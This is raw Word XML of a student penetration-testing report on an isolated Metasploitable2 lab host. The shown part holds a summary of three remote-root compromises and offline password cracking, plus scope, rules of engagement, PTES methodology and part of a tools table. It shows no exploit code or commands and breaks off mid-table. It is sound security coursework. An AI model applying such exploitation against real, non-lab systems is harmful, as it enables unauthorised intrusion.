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4E78"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">NETWORK VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">AND PENETRATION TESTING (VAPT) REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated Enterprise Network — Metasploitable2 Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="12" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: Harshit Vishwakarma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Program: B.Tech CSE, 7th Semester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Institution: Amity University Uttar Pradesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Type: Individual Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — For Academic Evaluation Purposes Only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180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents the findings of a Network Vulnerability Assessment and Penetration Testing (VAPT) engagement conducted against a simulated enterprise network in an isolated lab environment. The objective was to identify, validate, and document exploitable security weaknesses using a structured methodology aligned with the Penetration Testing Execution Standard (PTES).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment targeted a deliberately vulnerable host (Metasploitable2) representing a legacy, unpatched Linux server, a common scenario in real-world environments where outdated systems remain in production. Testing followed a grey-box approach, combining automated reconnaissance with manual exploitation to confirm real-world impact rather than relying solely on scanner output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A total of three critical, unauthenticated remote-root vulnerabilities were identified and successfully exploited, alongside a fourth high-severity finding demonstrating weak credential storage through offline password cracking. These findings demonstrate severe risk: an attacker with network access alone could gain full control of the host, access all stored data, and pivot further into the network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Statistics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shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Total Hosts Assessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Total Open Ports Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">30+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical/High Vulnerabilities Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 (3 Critical, 1 High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hosts Fully Compromised (Root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 of 1 (100%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the rising frequency and sophistication of cyberattacks, organizations must proactively identify and remediate security weaknesses in their network infrastructure before adversaries can exploit them. Vulnerability Assessment and Penetration Testing (VAPT) is a structured, industry-standard approach used by security professionals to systematically evaluate the security posture of networks and systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This project simulates a real-world VAPT engagement, following an established methodology, to identify, exploit, and report vulnerabilities in a controlled lab environment — bridging theoretical cybersecurity knowledge with hands-on offensive security practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Scope and Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment is limited to the isolated lab network built specifically for this project (Bridged network mode); no external or third-party systems were tested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing covered network-layer and host-layer vulnerabilities on the target host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing followed a grey-box approach, with the tester having prior knowledge of the network topology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All testing was conducted exclusively within a self-contained, isolated virtual lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Metasploitable2 (172.20.10.3), an intentionally vulnerable Linux VM designed for security training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker machine: Kali Linux (172.20.10.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No systems outside the lab environment were accessed or tested at any point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This engagement followed the Penetration Testing Execution Standard (PTES), comprising six phases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-Engagement — Defining scope, rules of engagement, and success criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance &amp; Information Gathering — Host discovery and service enumeration using Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment — Identifying and classifying vulnerabilities by CVSS severity based on service versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation — Manual exploitation of identified vulnerabilities using the Metasploit Framework to confirm real-world impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation — Demonstrating privilege escalation validation and sensitive data access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting — Compiling findings into this structured report with remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lab Environment and Tools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2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="2E75B6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool / Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Virtualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VirtualBox (Bridged Network Mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux (172.20.10.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerable Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable2 (172.20.10.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap 7.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
